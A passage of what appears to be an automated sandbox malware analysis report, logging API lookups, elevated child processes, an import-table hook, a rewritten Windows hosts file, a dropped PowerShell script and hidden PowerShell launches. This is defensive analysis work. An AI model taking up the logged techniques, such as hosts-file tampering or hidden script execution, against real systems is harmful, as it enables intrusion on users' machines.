Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Get Address c:\windows\syswow64\advapi32.dll function = SetSecurityDescriptorDacl, address_out = 0x74d5415e True 1
Get Address c:\windows\syswow64\advapi32.dll function = InitializeSecurityDescriptor, address_out = 0x74d54620 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
System (256)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-03-24 16:36:35 (UTC) True 1
Get Time type = Ticks, time = 118685 True 1
Get Time type = Performance Ctr, time = 18090393828 True 1
Get Time type = Ticks, time = 118716 True 1
Get Time type = System Time True 249
Get Time type = System Time, time = 2019-03-24 16:36:36 (UTC) True 1
Get Time type = Performance Ctr, time = 18121598718 True 1
Get Info type = Operating System True 1
Environment (2)
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Process #9: updatewin2.exe
Information Value
ID #9
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:01, Reason: Child Process
Unmonitor End Time: 00:01:03, Reason: Self Terminated
Monitor Duration 00:00:02
OS Process Information
Information Value
PID 0x9fc
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xA00
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
buffer 0x004E5000 0x004E5FFF Marked Executable - 32-bit - False
updatewin2.exe 0x00400000 0x0044CFFF Forced - 32-bit - False
updatewin2.exe 0x00400000 0x0044CFFF Process Termination - 32-bit - False
Modified Files
Filename File Size Hash Values YARA Match Actions
C:\Windows\System32\drivers\etc\hosts 7.92 KB MD5: 360d265eddea8679c434a205f7ade7ad
SHA1: e17d843f610e0283904e201195360525ae449a68
SHA256: 5a1597c0d29dd475e33cd8889d7d848037a8c17bad0f3daa022fb889e0db7ead
SSDeep: 96:vDZEurK9q3WlSyU0FXmGZll0TOHyF9fAHLmttA/ZKTKdIlMHqzoCGbXx:RrK9FU0FXmGZll06m9fAH6AhKTK9Cax
YARA Match: False
Host Behavior
File (9)
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\System32\drivers\etc\hosts desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Get Info C:\Windows\System32\drivers\etc\hosts type = size True 1
Open STD_INPUT_HANDLE - True 2
Open STD_OUTPUT_HANDLE - True 2
Open STD_ERROR_HANDLE - True 2
Write C:\Windows\System32\drivers\etc\hosts size = 7286 True 1
Module (135)
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Load KERNEL32.dll base_address = 0x76c20000 True 1
Load USER32.dll base_address = 0x74f40000 True 1
Load SHELL32.dll base_address = 0x75fd0000 True 1
Load SHLWAPI.dll base_address = 0x75340000 True 1
Load msvcr100.dll base_address = 0x749c0000 True 1
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Load kernel32 base_address = 0x0 False 2
Load kernel32 base_address = 0x76c20000 True 2
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Load api-ms-win-appmodel-runtime-l1-1-2 base_address = 0x0 False 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe base_address = 0x400000 True 2
Get Handle mscoree.dll - False 1
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 260 True 1
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x76c3196e True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x74fafd1e True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
System (256)
Operation Additional Information Success Count
Get Time type = System Time, time = 2019-03-24 16:36:36 (UTC) True 1
Get Time type = Ticks, time = 119434 True 1
Get Time type = Performance Ctr, time = 18165961372 True 1
Get Time type = Ticks, time = 119527 True 1
Get Time type = System Time True 249
Get Time type = System Time, time = 2019-03-24 16:36:37 (UTC) True 1
Get Time type = Performance Ctr, time = 18233617619 True 1
Get Info type = Operating System True 1
Environment (2)
Operation Additional Information Success Count
Get Environment String - True 2
Process #10: updatewin1.exe
671 0
Information Value
ID #10
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe" --Admin
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\
Monitor Start Time: 00:01:01, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:15
OS Process Information
Information Value
PID 0xa0c
Parent PID 0x9ec (c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xA10
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA
buffer 0x005A5000 0x005A5FFF Marked Executable - 32-bit - False
updatewin1.exe 0x00400000 0x0044CFFF Forced - 32-bit - False
Hook Information
Type Installer Target Size Information
IAT private_0x0000000000590000:+0x1679d 104. entry of updatewin1.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x0000000000b40000:+0x42f6f6
Dropped Files
Filename File Size Hash Values YARA Match
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 0.05 KB MD5: f972c62f986b5ed49ad7713d93bf6c9f
SHA1: 4e157002bdb97e9526ab97bfafbf7c67e1d1efbf
SHA256: b47f85974a7ec2fd5aa82d52f08eb0f6cea7e596a98dd29e8b85b5c37beca0a8
SSDeep: 3:uIHeGAFcX5wTnl:/eGgHTl
False
Host Behavior
File (8)
Operation Filename Additional Information Success Count
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Open STD_INPUT_HANDLE - True 2
Open STD_OUTPUT_HANDLE - True 2
Open STD_ERROR_HANDLE - True 2
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 size = 49 True 1
Process (2)
Operation Process Additional Information Success Count
Create powershell os_pid = 0xa4c, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Create powershell os_pid = 0xb04, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Module (150)
Operation Module Additional Information Success Count
Load kernel32.dll base_address = 0x76c20000 True 2
Load KERNEL32.dll base_address = 0x76c20000 True 1
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Load SHELL32.dll base_address = 0x75fd0000 True 1
Load SHLWAPI.dll base_address = 0x75340000 True 1
Load msvcr100.dll base_address = 0x749c0000 True 1
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Load kernel32 base_address = 0x0 False 2
Load kernel32 base_address = 0x76c20000 True 2
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 260 True 1
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
